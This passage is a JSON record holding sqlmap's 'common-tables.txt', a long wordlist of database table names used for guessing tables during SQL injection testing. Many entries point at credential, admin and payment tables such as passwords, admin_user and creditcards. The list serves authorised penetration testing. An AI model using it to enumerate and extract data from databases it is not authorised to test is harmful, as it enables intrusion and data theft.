  {
    "path": "sqlmap/data/txt/common-tables.txt",
    "content": "# Copyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\n# See the file 'LICENSE' for copying permission\n\nusers\ncustomer\nuser\norders\nemployee\nx_world\ncategory\nproject\naccount\ncustomers\ncountry\nconfig\ngroups\ninventory\ndepartment\ncategories\nmessages\nperson\ncomments\nsessions\nstudent\nitems\nemployees\nlanguage\naccounts\nproduct\nCUSTOMER\nfaculty\nlocation\nitem\nauthors\nparts\nmembers\ncountries\nstatus\nmenu\ndependent\nmodules\nrole\nproducts\npage\nchart\ntask\nposts\nDEPT\nPerson\nuser_role\nORDERS\nemp\nalbum\nEMP\nlog\nINVENTORY\npayments\npart\npermission\ncontact\nborrower\nreport\ncolor\nadmin\nSALGRADE\nPRODUCT\nvendor\ntax\nbranch\nprojects\ndata\ncourse\njobs\nwatchlist\nshipment_line\nCATEGORY\ncategoryNames\nattributeCategory\ndb\nPS_DMK\nstudy\nevent\ninvoice\norder_source\ntopics\nstudents\norder_line\nregions\nCPG_config\nnews\ndept\npermissions\nevents\nshipment\nsections\nITEM\nhosts\nform_definition_version\nalias\npeople\nrole_permission\napplications\nCPG_usergroups\nimage\norganization\ncourses\nloan\nform_definition\nconfiguration\nhibernate_unique_key\norder\nform_error\npayment\nAuthor\nhistory\ntask_param\nmovies\ndept_locations\ntrack\nservices\nEMPLOYEE\nworks_on\npatient\nStudent\nform_data\nsetting\nPUBLISHER\npartsgroup\nlanguages\ndepositor\nCPG_categories\nbook\nOrders\njob_history\nmetadata\nexchangerate\nshipto\nrcpt\nteam\naddress\ntasks\nqueue_info\nsubscribers\ncity\nfield_options\nlocations\nstatename\nBOOK\nzuseserver\nap\nar\nEmployees\nUSER\nuserInfo\ntelephone\nsession\nUser\nvideo\nLOCATION\ntf_links\nACCOUNT\nartist\nproperty\nthe\nrequest\nacc_trans\nlending\npostaladdress\nCustomers\nxmldocument\njiveID\ndomain\npromotion\nCPG_filetypes\nassembly\nbusiness\norderitems\nlocale\ngl\nlinks\nlocated\nidentities\nsizes\ncompanies\npayload\nOrganization\nprotocol\ntransfers\nencompasses\nborders\nprofiles\nsalesorder\nmailbox\ncontacts\ntables_priv\nadmin_logs\ntext\nphpbb_config\nplugin\nstores\nhost\nBook\ngifi\nuser_groups\nterm\ninternetaddress\ntf_settings\nregion\npoll\nmakemodel\npartstax\ncatalog\nquestion\nvendors\ndepartments\nnotes\ndelivery_quality\nqueries\nidentification\nfriends\nvcd_Screenshots\nPERSON\ncourse_section\nvcd_PornCategories\npma_history\njiveRemoteServerConf\nchannels\nobject\nchip_layout\nosc_products_options_values_to_products_options\nlogin\nuser_newtalk\nvcd_MetaDataTypes\nentrants\nDevice\nimageInfo\ndevelopers\ndiv_experiment\nitems_template\ndefaults\nosc_products\nvcd_MetaData\nmucRoomProp\nQRTZ_JOB_DETAILS\nsettings\npma_bookmark\nDEPENDENT\nimageCategoryList\nislandIn\nmobile_menu_text\njiveUserProp\nosc_products_options_values\nwp_posts\npackage\nmucRoom\nvendortax\nvcd_Comments\nattrs\nconfig_seq\ncompany\nregister\nchecksum_results\nENROLLMENT\noperation\nprimarytest\nvcd_CoverTypes\nbinaries\nCOURSE_SECTION\nStudents\nfunc\nenrollment\npma_table_coords\nreaders\naction_element\nvcd_VcdToPornstars\nosc_categories_description\nfriend_statuses\nDomain\nservers\nUserFields\nrevision\nmeals\nresources\nmixins\nsys_options_cats\nlicenses\npma_relation\nSIGNON\nclients\nApply\nvcd_CoversAllowedOnMediatypes\nThumbnailKeyword\nform_definition_text\nvcd_Log\nsystem\njiveOffline\ntickers\nBANNERDATA\nmucAffiliation\nfk_test_has_pk\nrooms\nobjectcache\ncollection_item_count\ndiv_stock_parent\njiveRoster\nVolume\nlookup\ninvestigator\nmath\njivePrivate\nvcd_UserWishList\nosc_manufacturers_info\nprimarytest2\nPROFILE\ncategories_posts\nFlight\nGallery\nscripts\nAUTHOR\nphysician\nclient\ncv_country_synonyms\nosc_categories\ninterwiki\nlogtest\narchive\nmembers_networks\nvcd_MovieCategories\nlanguage_text\nUserType\nfriend\ndiv_annotation_type\nosc_products_description\nosc_products_to_categories\nQRTZ_PAUSED_TRIGGER_GRPS\narticle\nrecentchanges\nvcd_UserLoans\nmedia\nvcd_SourceSites\nconducts\nsales\nCurrentUsers\nCountry\nvcd_IMDB\nvcd_Borrowers\nquerycache\nPublication\nPilot\ndiv_stock\nRegions\nDEPT_LOCATIONS\nvcd_Users\nmaster_table\nvcd_VcdToUsers\nfunny_jokes\njos_vm_payment_method\nvcd_UserProperties\nosc_products_images\nspecialty\npma_pdf_pages\nvisits\ndiv_allele_assay\nvcd_MediaTypes\nipblocks\nWidgetPrices\nform_definition_version_text\nexperiment\nPublisher\ncontrol\nprotocol_action\njivePrivacyList\nvcd_VcdToPornStudios\nsubImageInfo\nplugin_sid\nmessage_statuses\nstate\nGalleryThumb\nhitcounter\nvcd_Pornstars\nQRTZ_BLOB_TRIGGERS\ndiv_generation\njiveGroupProp\ningredients\ncommunity_item_count\njiveExtComponentConf\nSEQUENCE\nContinent\nrights\ndiv_statistic_type\nPath\nosc_manufacturers\nlogging\ncolnametests\nQRTZ_FIRED_TRIGGERS\ndiv_locality\nsailors\nDescription\nwarehouse\nDEPARTMENT\nlegacy_things\njiveVCard\nagent\nCPG_bridge\nCUSTOMERS\njiveProperty\napp_user\nkeyboards\ndiv_unit_of_measure\ncategorylinks\ngrants\nAction\ndiv_trait\ndiv_trait_uom\nWidgetReferences\nproduct_type\ndevelopers_projects\nuserAttribute\nvcd_Sessions\nform_data_archive\nvcd_PornStudios\naction_attribute\nThumbnail\njiveGroupUser\ncomputers\nQRTZ_LOCKS\nvcd_PropertiesToUser\ncustomertax\nsector\nnetworks\ncolumns_priv\nglobals\ndiv_obs_unit_sample\nWidgets\nTERM\nsalgrade\ndiv_passport\nvcd_UserRoles\nmucMember\nimagelinks\nexchange\nStatus\nWORKS_ON\nlines\ntestusers\nbooleantests\nQRTZ_SIMPLE_TRIGGERS\nmobile_menu\nstaff\nvcd_VcdToPornCategories\ntblusers\nhashes\npartner\nProduct\npersonnel\nads\nvcd_Covers\nosc_specials\nKeyword\nsupplier\nagent_specialty\npokes\nprofile_pictures\noldimage\ndiv_poly_type\nosc_products_attributes_download\ndiv_allele\nisMember\nvcd_Images\nuserImageRating\ndetail_table\nosc_products_attributes\npma_table_info\nofficer\ndiv_obs_unit\nvcd_Settings\nCOURSE\nTime\nlocatedOn\nmedicalprocedure\nfk_test_has_fk\nmergesWith\nauthor\nUserFieldsInfo\nEmployee\noe\nQRTZ_TRIGGERS\ninsurance\nSUPPLIER\ndiv_aa_annotation\nsong\nimageAttribute\nviews_track\nextremes\nvcd_VcdToSources\njiveRosterGroups\nwebcal_config\nphpbb_ranks\ntriggers_template\nappVersions\nvcd_RssFeeds\nDUMMY\nROLE\nactivity\nstudy_text\nosc_products_options\nCity\nQRTZ_SCHEDULER_STATE\nosc_reviews\nedge\nquestions\npartof\nblobs\nQRTZ_CRON_TRIGGERS\ntag\nuserSession\nvcd\npma_column_info\nauto_id_tests\njob\nsite_stats\nmucConversationLog\nsequence\nmadewith\nOperationStatus\nSPJ\nturizmi_ge\nzutat_cocktail\nDWE_Internal_WF_Attributes\nzipcodes\ninsertids\nChemList\nproduct_category\nforeigntest2\nhero\ncmContentVersionDigitalAsset\nreports\ndevel_logsql\nf_sequence\nMEMBER\nClassificationScheme\nez_webstats_conf\ncredential\nutilise\ncmDigitalAsset\nACL_table\nservice_request_log\nfeedback\nvars\ntblblogentriescategories\nassignment\nCUST_HIST\new_menu\ntime_zone_transition_type\nchild_configs\nLIBRARY_BRANCH\nCompany\nComponent\nwebcal_entry_log\ntransactions\nwebcal_entry_ext_user\ndept_location\nConsultantsTable\nphonelist\nsys_acl_actions\nparticipate\npopulation\ndtb_order\nfiles_config\nPropColumnMap\nresult\npma_designer_coords\ntriggers\naudittrail\nf_attributedependencies\norganization_type_package_map\nDWE_Corr_Sets\nuserlist\nbackgroundJob_table\nsf_guard_user_permission\nmy_lake\nDWE_Corr_Tokens\nsampleData\nqrtz_blob_triggers\nreciprocal_partnersites\nrss_categories\nADMIN\nsite_map_ge\nFactory_Output\ngeo_Estuary\nphpbb_themes\nforum\nClientsTable\nmushroom_trainset\nrating_track\niplinks\nmaxcodevento\nreciprocal_admin\new_moduli\nCheckType\ncmLanguage\nphpbb_points_config\nguava_sysmodules\nquerycachetwo\nsoc_da_polit_ge\nBOOK_AUTHORS\nrecords\nreciprocal_config\nnewsletter_queue\npasswds\nphpbb_posts_text\nbiosample\nconnectorassocs\nBOOK_COPIES\njos_sections\nvote\nSCRIPT\nTHOT_CATEGORY\nartifact\nobject_types\npages\nusuario\nCE_table\nphpbb_forums\ntbl_country\nProducts\ndtb_bat_order_daily\nsite_wtype\ngeo_mountain\nexpression\nSimple_Response\nphotoo\nphotos\nchild_config_traffic_selector\nversion_data\nallocation\ndtb_category_total_count\nhabilidad\nPREFIX_group_lang\nwork_orders\nSELLER\ncv_soil\ntaxon\nbkp_ItemResource\nezcontentobject_trash\nwebcal_view\npagecontent\nCollection\nmaxcodcurso\nself_government_ge\nphpbb_user_group\nInstanceStringTable\nbldg_types\nt1\nmailaddresses\nsection\nm_type\nconfiglist\ncmRepositoryContentTypeDefinition\ntrade\nParameter\njforum_privmsgs\ntbl_works_categories\nhelp_category\nbkp_String\nClass_Display_Sequence\nEPIXEIRISI\nsounds\nphpbb_groups\ndtb_campaign\nproduit\nadblocks\nvendor_seq\nguava_theme_modules\ndtb_pagelayout\nbookings\ncmPublicationDetail\nwrites\nwriter\ndistance\nDWE_Resource_Attributes\njforum_groups\nPolynomial\nriver\nGROUP\nsea\nIDIOTIS\ncmPublication\nlast\nUsageParameter\nphpbb_topics\nt_peep\nPREFIX_group\ndtb_delivfee\nequipment_type_seq\nwp_users\nnews_category\nSchemaInfo\nWidgetDescriptions\ndtb_category_count\nsidebar\nR1Weights\nhumanitaruli_ge\ncmTransactionHistory\nfacets\njforum_roles\nsamedicino_ge\nqrtz_job_listeners\ngeo_Lake\nreligion\nnuke_gallery_media_class\ncia\nDatabaseInfo\nR2TF\nTHOT_THEME\nR1Length\ncmContentRelation\nS2ODTMAP\nenrolled\nliste_domaines\nDEMO_PROJECTS\nORDERSTATUS\nsite_iwis\nMountainOnIsland\nbkp_ItemReference\nCategory\nMountain\nINSTITUTE\nPOINT\nforum_vote\nTHOT_TYPE\ncmts_track\nbkp_ItemReplication\nhostbenchmarks\nfilearchive\nf_spatialcontext\nUM_ROLE_ATTRIBUTES\nSCALE\nmaclinks\nbooks\nDWE_Predecessors\ninteractions\ngraphs_items\nstars\nBID\nenrolls\nsite_environment\nuser_types\nSeverity\npartscustomer\nwp_pod_types\nRiver\nmarital_status\nPZ\nPN\nemail\nCustomerCards\nmtb_zip\nCampus\nR1Size\nhardware\ndtb_other_deliv\npricegroup\ncommissionEmployees\ncv_pests_diseases\ntbl_tech\nmacswitches\ncc_config\naudit\ncolour\ncommand\naudio\negresado\naggtest\ntransport\nzusti_da_sabuneb_ge\ndiv_scoring_tech_type\nR2Weights\nschedule\nrouters\nzips\nDWE_Delay_Timers\nDescriptions\nsoftware\nwh_der_children\ndelivery\nplacex\ncv_crops\nproblem\nStation_Data\naccount_transaction\ntime_zone_name\nnumedia\nTHOT_DEEP\nZENTRACK_VARFIELD_IDX\nroads_endpoints\nPropdesc_table\ngeneral_log\npeer_configs\nhot_prop\nphones\nServiceBinding\nemailinfo\ndtb_member\ncmSiteNode\nnodes\nsbreciprocal_cats\nrss_read\nDWE_Workflow_Documents\nbombing\ntblblogtrackbacks\nfragment\ndtb_review\ntblblogsearchstats\ndatasources\nCPG_users\nvrls_partners\nguava_roles\nwebcal_user_layers\nANSWER_GROUP_DETAIL\ntbl_clients\ndtb_kiyaku\nEmailAddress\nSea\npowers\nQRTZ_CALENDARS\nreserve\nLINEITEM\nproject_user_xref\nAgent\nidioma\ndtb_campaign_detail\njos_components\nuser_rights\ntf_messages\nClass_Def_Table\ngeo_lake\ncopytest\ntissue\nligneDeFacture\nPZ_Data\ntf_cookies\narchtypes\ncmts\nphoto\ndtb_bloc\nuser_preferences\nmusic_ge\nD_Abbreviation\ndata_set_association\nsite_location\njforum_posts\nProperty\npg_ts_dict\nbadspy\ngearing\ncredenziali\nabstract\nevidence\nfiles\ntest\nintUsers\ndiv_treatment\ntblblogentries\ncocktail_person\ncdv_curated_allele\nREORDER\nReligion\nturns\nMetadataValue\ncurso\nredirect\naccountuser\nqrtz_cron_triggers\nStateType\nforum_user_stat\nDescriptions_Languages\nm_users_profile\nBooked_On\nnot_null_with_default_test\ntblblogroles\norganizations\ntopic\neconomy\nDWE_Org_Resources\nModel\nmaxcodcorreo\nRATING\nTransactions\nChemicals\nm_data\nUSER_GROUP\nequipment_type\ngeo_Island\nsysmaps\nezin_roles\nphpbb_themes_name\ndtb_send_history\ndtb_send_customer\ncart\nsize\npg_ts_cfgmap\nLimitTest2\nQUESTION\nDC_Data\nwebcal_group_user\ntelefono\nbuilds\ntbluserroles\nwebcal_site_extras\nsolde\ndocument\nm_users_acct\nvendor_types\nfruit\nDWE_Resources\nService\nPART\ncell_line\ndtb_bat_order_daily_age\nimages\napartments\nTHOT_ALPHA\nippaths\narea\nSYNALLAGI\nsysmaps_hosts\ntbl_works\nstatuses\nwebcal_user\ncustomurl\nTHOT_YEAR\nDWE_Subscriptions\ncorreo\nkultura_ge\nFactory_Master\ninv_lines_seq\ncertificates\nwebcal_asst\nostypes\nPOINT_SET\nR2IDF\nforum_flag\nbugs\ntaxonomy\nUM_ROLES\ndiv_synonym\npayer\ntf_log\njob_title\nask\nwp_options\nforum_user_activity\ntrackbacks\nwp_pod_fields\ncmAvailableServiceBindingSiteNodeTypeDefinition\ntranslation\ncdv_passport_group\nUser_\nUsers\naccess_control\nmy_county\nzoph_people\naccount_permissions\nORDERLINES\nganatlebe_ge\nwp_term_relationships\npictures\nproduct_font\nDeparture\nmushroom_test_results\nrouterbenchmarks\nbkp_Item\nChannel_Data\nrealtable\nmushroom_NBC_class\nodetails\nuser_type_link\neco_da_biz_ge\nbelong\nezin_users\ntime_zone_transition\new_tabelle\nezsearch_return_count_new\ncmSystemUserRole\nm_users\ndiv_accession_collecting\nEconomy\ntbl_works_clients\nqrtz_locks\ngeo_Mountain\ndtb_category\ntmp\nreservation\ngeo_Desert\ndtb_payment\nforum_topic\nezsearch_search_phrase_new\njforum_attach\nsazog_urtiertoba_ge\nEquipment\niuridiuli_ge\nMetadataSchemaRegistry\nbasePlusCommissionEmployees\naddresses\nphpbb_search_wordlist\nuser_defined_attribute\nfournisseurType\ndpt_trans\nPostalAddress\ndefaultinsertid\nPolitics\npools\ncocktail_lokal\ndtb_blocposition\ntemplatelinks\njforum_ranks\nD_Format_Data\ntblblogtextblocks\ntime_zone_leap_second\nrss\nDecimation\ndtb_user_regist\nf_options\nsiteIndexTable\nAdministrator\nphpbb_users\nezin_authors\nSpecificationLink\nvideos\nsf_guard_remember_key\nemployer\nmonitoringi_ge\nleases\nphpbb_smilies\nstats\nf_spatialcontextgroup\nexperiencia\ndtb_csv\nline_items_seq\nndb_binlog_index\nzoph_categories\nhelp_topic\ndiv_treatment_uom\ntransaction\nwp_links\nDWE_Organizations\nlive_ge\ncdv_allele_curated_allele\ntimeperiod\nitem_master_seq\nGLI_profiles\ncv_countries\nqrtz_scheduler_state\njournal\ntf_users\nmwuser\nstories\ndtb_table_comment\njforum_quota_limit\nLake\nSQLDATES\nphpbb_search_wordmatch\nfriend2\nfunctions\ncomboboxes\nDWE_Max_Id\nstd_item\nforeigntest\njiveVersion\nsf_guard_group\nClassification\nSensitivity\nPREFIX_category_group\npreferences\ncredit\ngeo_sea\ntype\nknjiga\nFindCriteria\nzoph_prefs\nwebcal_entry_repeats\nroom\ndomain_info\nSALES\nDWE_Tasks\nprofession1\nSUPPORT_INCIDENTS\nPERMISSION\nDefect\nDWE_Task_Attributes\ngrandchild_test\nDesert\nKARTA\nUM_ROLE_PERMISSIONS\nPurchases\nPREFIX_configuration\nguava_themes\nalltypes\nwebcal_view_user\nvrls_xref_country\nR1TF\nsubject\ncontinent\nD_Format\ndtb_recommend_products\nLinkdesc_table\nqrtz_fired_triggers\nTelephoneNumber\ndtb_customer_mail_temp\ncopyrights\njforum_extension_groups\nDEMO_ASSIGNMENTS\nguava_group_assignments\njforum_extensions\nzutat\new_user\nduptest\nalerts\npartsvendor\njiveGroup\norganization_seq\ndtb_customer_reading\nconfiguratore\ntbl_event\nmy_street\nosvendors\nsoftwares\nSession\nadmins\nTIL_IDIOTON\nEthnicGroup\nreviews\ntblblogentriesrelated\nguava_packages\nGRouteDetail\ncdv_reason\nnulltest\nmembership\nbkp_RS_Servers\nvrls_listing_images\nschema_info\nentity\ngroup\nClassificationNode\ndtb_best_products\ncv_cropping_system\nDWE_Workflows\negresadoxidiomaxhabilidad\nlocus_data\ndtb_order_temp\ntblblogsubscribers\naccount_log\nfacture\nMetadataFieldRegistry\nBRANCH\norgs\nDM\nNextID_table\nwebcal_group\nDC\nwp_pod_widgets\nchromosomes\nName\nroster\ndtb_csv_sql\nsynchro_type\nlanglinks\ngenres_in_movies\nqrtz_triggers\nProvince\nanswerOption\nwp_postmeta\nERDESIGNER_VERSION_ID\ncalendar\ncmEvent\nruletest\nforum_user\nSalesReps\new_gruppi\nvrls_xref_state_province\nconferences\npay\nPlane\nwebcal_entry_repeats_not\nIsland\ntbl_works_tech\nwebcal_import\nnuke_gallery_comments\nmonthlabel\ntblblogcomments\ndtb_delivtime\nproduct_size_multi\nmanufacturer\nTasks\nisland\ncoupon\nwebcal_report\nRegistryPackage\nsysmaps_links\nprocs_priv\ninvoices_seq\nfilm\ngenres\nfield\nvertex\nFoundThumbs\nqrtz_trigger_listeners\nreciprocal_links\nDWE_Meta_Data\nCourse\nidiomaxegresado\nordreReparation\nAssigned_To\nORDERITEMS\nPREFIX_product_attribute_image\nCOLLECT_SITE\nTHOT_CONCEPT\npublisher\ndtb_mailmaga_template\nDSObject_table\nforum_post\nsf_guard_permission\nPrefixes\ndtb_update\nBROWSE\ntf_rss\nTIME\nreciprocal_mails\nassociation\ntypeFacture\nStringTable\nCATEGORIES\nLanguage\nmountain\nad_locales\nExtrinsicObject\nR2Size\ngeo_island\nderived_types\nsnipe_gallery_cat\nqrtz_job_details\nguava_roleviews\nproduction_wtype\nAccountXML1\nwh_man_children\nnot_null_test\nproduct_colour_multi\nike_configs\nintUseringroup\nstudy_user\npg_ts_cfg\nconnectorswitches\nprocedure_biosample\ntheday\nfournisseur\ntypeProduit\nBOOKAUTHOR\npasswords\nkeys\nAuditableEvent\nExternalIdentifier\nsource\nBOOK_LOANS\nUserRole\nvrls_xref_listing_offer_type\ncmRole\nPREFIX_search_engine\nmy_poi\nChannel_Comment\nforum_cat\ninvite\nPREFIX_order_return_state\nexperimental_data_set\nDOCUMENT_FIELDS\nScripts\nmushroom_dataset\ndesert\nCan_Fly\nsynchro_element\nmaxcodtelefono\nenrollments\ntblblogpages\nf_attributedefinition\nintGroups\nway_nodes\nchild_test\nTHOT_TARGET\nMOMENT\ndtb_classcategory\nproduct_price\nrelation_members\nPREFIX_access\ndtb_deliv\nwebcal_categories\nParts\ninvoices\nQRTZ_JOB_LISTENERS\nANSWER\ntbl_categories\nyearend\nDEPARTMENTS\naccount_level\nref\nhelp_relation\nzoph_users\nprocedure_data_set\nAssociation\nmtb_pref\nANSWER_GROUP\nGDirectedRoute\ngraphs\noccasion\naccount_temp\nnuke_gallery_categories\nareas\ncmContentVersion\nchecksum_history\nmushroom_test_results_agg\naccessTable\ncameFromTable\nservices_links\nCoefficients\nreglement\nmaxcodexperiencia\nvrls_xref_listing_type\nadv\nlake\ntests\nOffices\nqrtz_simple_triggers\nEditor\nsazog_urtiertoba_ge2\nwp_pod_pages\nExtlangs\nseq_gen\nrss_subscription\nStation_Comment\nR1IDF\njforum_config\ncmServiceDefinitionAvailableServiceBinding\ngeo_River\nfacilities\nconnectorlinks\nfile_storage\nneuf\nschool\nwp_term_taxonomy\nm_plans\nligneDeCommande\nFORM_QUESTION\nhistory_str\nf_classtype\nendpoints\nR2Length\nzoph_albums\nbkp_ItemPresentation\ntblblogcategories\ndiv_taxonomy\ntraffic_selectors\nFORM\nqrtz_paused_trigger_grps\ncreditcards\npeople_reg\ncountry_partner\njforum_users\narray_test\ndtb_mail_history\npriorities\nrelations\ncombustiblebois\nslow_log\nDWE_Resource_Roles\nWROTE\nflow\npay_melodies\ndtb_templates\nvariable_interest\ndtb_class\nZENTRACK_VARFIELD\ncatalogue\nuplebata_dacva_ge\nwp_usermeta\ntime_zone\ngames\nwp_terms\nsf_guard_user_group\nhonorsinfo\nmaxcodestudio\nestudio_academico\nRECORD\nRoom\nalarms\new_temi\nclubs\nnet_pm\ntbl_state\ncmContentTypeDefinition\nradacct\npeer_config_child_config\ncmAvailableServiceBinding\ncmSiteNodeVersion\nPoles_Zeros\nipmacassocs\nm_news\ndtb_news\nshared_secrets\nUsageDescription\nrol\nphpbb_posts\nipassocs\ncmSystemUser\nphpbb_categories\nFoundLists\njforum_smilies\nchannelitems\nlokal\nsubcategory\nLanguages\njiveSASLAuthorized\nDWE_WF_Attributes\ncocktail\ncust_order\nmushroom_testset\nTHOT_SOURCE\nproduct_font_multi\npresence\nUM_USERS\njiveUser\ncmSiteNodeTypeDefinition\nwp_comments\ndtb_bat_order_daily_hour\njos_vm_category\nCONTACT\nSpecialityTable\nlibrarian\ngeo_river\nMonitorStatus\npagelinks\nways\nDWE_Roles\njforum_vote_desc\ncities\nPREFIX_order_return_state_lang\nsubscriber\nprereq\nSlot\nrss_item\nUM_USER_ROLES\nPREFIX_timezone\nevento\nguava_views\ncmServiceDefinition\nVariants\nsearchindex\nactions\ncdv_passport_set\nproduction_multiple\npage_log_exclusion\nfurniture\nnuke_gallery_pictures\ncmRepositoryLanguage\noc\nos\nPREFIX_tab_lang\nlc_fields\nframework_email\ndatasets\nsporti_ge\nexternallinks\ngeo_desert\npolitics\nhourlyEmployees\nD_Comment\nEMPLOYEES\nindividual\nm_with\nprogram\ncombustible\nezin_articles\npma_tracking\nhelp_keyword\nPOSITION\nstars_in_movies\nglas\ncmRepository\ndtb_mailtemplate\nDIM_TYPE\ncart_table\nD_Unit\narray_probe\nmacassocs\nchangeTva\nUM_PERMISSIONS\ngeo_Source\nR1Sum\ncdv_marker\nnuke_gallery_template_types\nUM_USER_ATTRIBUTES\nAircraft\nstore\nDescriptions_Variants\ntrigger_depends\nguava_role_assignments\nExternalLink\nbkp_RS_Clusters\nPN_Data\nusers_sessions\nwebcal_nonuser_cals\nparent_test\ncmServiceBinding\nBUYER\ntranscache\ndtb_question_result\nrss_category\nprofiling\nQRTZ_TRIGGER_LISTENERS\nTHOT_LANGUAGE\ncmContent\nDescriptions_Scripts\nDSProp_table\nwebcal_report_template\nservice_request\nresource_types\nTHOT_SUB_MENU\nbkp_ResourceFolder\nPREFIX_tab\nprovince\ndtb_bat_relate_products\nchangePrix\nproc\newst_sessioni\nnuke_gallery_media_types\noutdoor_spaces\npo_seq\nsalariedEmployees\ngrp\njforum_topics\ndefertest\narray_data\nmost_recent_checksum\nm_earnings\nproduct_related\ndtb_baseinfo\nwebcal_import_data\nfederationApplicants\nqrtz_calendars\nmelodies\njforum_forums\nsf_guard_group_permission\nsys_acl_matrix\nR2ODTMAP\nmushroom_NBC\ncountry_diseases\ndtb_order_detail\nsic\nPROJECT\nlog_fake_referers\nROLE_PERM\nisDeleted_table\nvrls_listings\nTable\nsf_guard_user\nSubject\ncdv_curation\ndictionary\nforum_report\ninstitution\ncmQualifyer\njforum_categories\nsite_climatic\nphpbb_points_values\nzoph_color_schemes\nDWE_Internal_Task_Attributes\nuniquetest\nTypeRule\ndtb_customer\nR2Sum\nPREFIX_customer_group\nProjectsTable\ndtb_products\nwords\ndtb_question\nUM_USER_PERMISSIONS\nexam\ncommande\nviktorina_ge\ndtb_products_class\nsubscribe\npage_restrictions\nquerycache_info\ncdv_map_feature\noidtest\nLink_table\nguava_users\nconnectormacassocs\nmoduleexecs\nguava_groups\nInstitution\nsconfig\nshared_secret_identity\nplatforms\nBORROWER\nphpbb_acl_options\nmarkers\nPopulation\nshipping\nguava_preferences\nrating\nUserCapability\nPriority\nrec_jobs\nezin_sections\nDescriptions_Regions\nSPACE\ngeo_Sea\nDATA_ORG\nContributor\nflag\n\n# Various Joomla tables\n\njos_vm_product_download\njos_vm_coupons\njos_vm_product_reviews\njos_core_acl_aro\njos_vm_shopper_vendor_xref\njos_stats_agents\njos_vm_orders\njos_poll_menu\njos_content_rating\njos_vm_vendor\njos_vm_product_mf_xref\njos_vm_export\njos_polls\njos_content_frontpage\njos_vm_userfield_values\njos_categories\njos_poll_data\njos_vm_manufacturer\njos_vm_order_user_info\njos_core_acl_groups_aro_map\njos_messages\njos_vm_zone_shipping\njos_bannertrack\njos_vm_order_status\njos_modules_menu\njos_vm_product_type\njos_vm_product_type_parameter\njos_vm_tax_rate\njos_core_log_items\njos_modules\njos_users\njos_vm_product_category_xref\njos_vm_product_attribute\njos_poll_date\njos_vm_vendor_category\njos_vm_state\njos_vm_country\njos_weblinks\njos_vm_cart\njos_vm_shipping_label\njos_vm_manufacturer_category\njos_vm_shopper_group\njos_vm_product_votes\njos_vm_currency\njos_vm_creditcard\njos_menu\njos_groups\njos_messages_cfg\njos_vm_order_payment\njos_content\njos_bannerclient\njos_vm_product_discount\njos_core_log_searches\njos_vm_auth_user_group\njos_contact_details\njos_vm_auth_group\njos_vm_waiting_list\njos_vm_category_xref\njos_newsfeeds\njos_vm_auth_user_vendor\njos_vm_user_info\njos_vm_function\njos_vm_product_files\njos_vm_userfield\njos_vm_shipping_carrier\njos_core_acl_aro_map\njos_vm_shipping_rate\njos_vm_product\njos_vm_product_product_type_xref\njos_core_acl_aro_groups\njos_templates_menu\njos_menu_types\njos_plugins\njos_session\njos_vm_order_item\njos_vm_module\njos_vm_product_attribute_sku\njos_vm_product_price\njos_vm_csv\njos_migration_backlinks\njos_vm_product_relations\njos_core_acl_aro_sections\njos_vm_order_history\njos_banner\nphp_users\nALL_USERS\nbanned_users\nusers_tmp\nusers_club\npublicusers\ncmsusers\n\n# List provided by Anastasios Monachos (anastasiosm@gmail.com)\n\nblacklist\ncost\nmoves\npelates\ntamio\ntameio\nxristes\nzones\ntamio_pelates\nkwdikos\naddressbookgrp\nsendmsgs\npublicationauthor\npublicationfile\ntopicpublication\nuserrights\ncomp_group\ncomputers_ID\nevent_log\nnetworking\nrouting\nsoftware_licenses\nips\narxeia\nSMS_TABLE\nTABLE_PRIVILEGE_MAP\nAMUSER\nCONTACTTYPE\nCONTENT\nDOWNLOADGROUP\nDOWNLOADS\nDOWNLOADTYPE\nEMAIL\nENQUIRY\nFACTSHEET\nFUND\nFUNDGROUP\nHISTORY\nMANAGEMENTGROUP\nSUBSCRIBE\nTBLUSERS\nTBLLIST\nTBLLOG\nTBLPROFILES\nTBLREPORTS\nTBLTRANSACTIONS\nTBLRETAILUSERS\nTBLCORPUSERS\nTBLCORPORATEUSERS\n\n# List from schemafuzz.py (http://www.beenuarora.com/code/schemafuzz.py)\n\ntbladmins\nsort\n_wfspro_admin\n4images_users\na_admin\nadm\nadmin_login\nadmin_user\nadmin_userinfo\nadminister\nadministrable\nadministrate\nadministration\nadministrator\nadministrators\nadminrights\nadminuser\nart\narticle_admin\narticles\nartikel\naut\nautore\nbackend\nbackend_users\nbackenduser\nbbs\nchat_config\nchat_messages\nchat_users\nclubconfig\ncontent\ncpg_config\ncpg132_users\ncustomers_basket\ndbadmins\ndealer\ndealers\ndiary\ndownload\nDragon_users\ne107_user\nfusion_user_groups\nfusion_users\nibf_admin_sessions\nibf_conf_settings\nibf_members\nibf_members_converge\nibf_sessions\nicq\nindex\ninfo\nipb_sessions\njoomla_users\njos_blastchatc_users\njos_comprofiler_members\njos_joomblog_users\njos_moschat_users\nknews_lostpass\nkorisnik\nkorisnici\nkpro_adminlogs\nkpro_user\nlogin_admin\nlogin_admins\nlogin_user\nlogin_users\nlogins\nlogon\nlogs\nlost_pass\nlost_passwords\nlostpass\nlostpasswords\nm_admin\nmain\nmambo_session\nmambo_users\nmanage\nmanager\nmb_users\nmember\nmemberlist\nminibbtable_users\nmitglieder\nmovie\nmybb_users\nmysql\nname\nnames\nnews_lostpass\nnewsletter\nnuke_authors\nnuke_bbconfig\nnuke_config\nnuke_popsettings\nnuke_users\nobb_profiles\nparol\npartners\npasses\npassword\nperdorues\nperdoruesit\nphorum_session\nphorum_user\nphorum_users\nphpads_clients\nphpads_config\nforum_users\npoll_user\npunbb_users\npwd\npwds\nreg_user\nreg_users\nregistered\nreguser\nregusers\ncards\nsite_login\nsite_logins\nsitelogin\nsitelogins\nsites\nsmallnuke_members\nsmf_members\nSS_orders\nstatistics\nsuperuser\nsysadmin\nsysadmins\nsysuser\nsysusers\ntable\ntables\ntb_admin\ntb_administrator\ntb_login\ntb_member\ntb_members\ntb_user\ntb_username\ntb_usernames\ntb_users\ntbl\ntbl_user\ntbl_users\ntbluser\ntbl_client\ntblclients\ntblclient\nusebb_members\nuser_admin\nuser_info\nuser_list\nuser_login\nuser_logins\nuser_names\nusercontrol\nuserinfo\nuserlogins\nusername\nusernames\nvb_user\nvbulletin_session\nvbulletin_user\nvoodoo_members\nwebadmin\nwebadmins\nwebmaster\nwebmasters\nwebuser\nwebusers\nx_admin\nxar_roles\nxoops_bannerclient\nxoops_users\nyabb_settings\nyabbse_settings\nACT_INFO\nActiveDataFeed\nCategoryGroup\nChicksPass\nClickTrack\nCountryCodes1\nCustom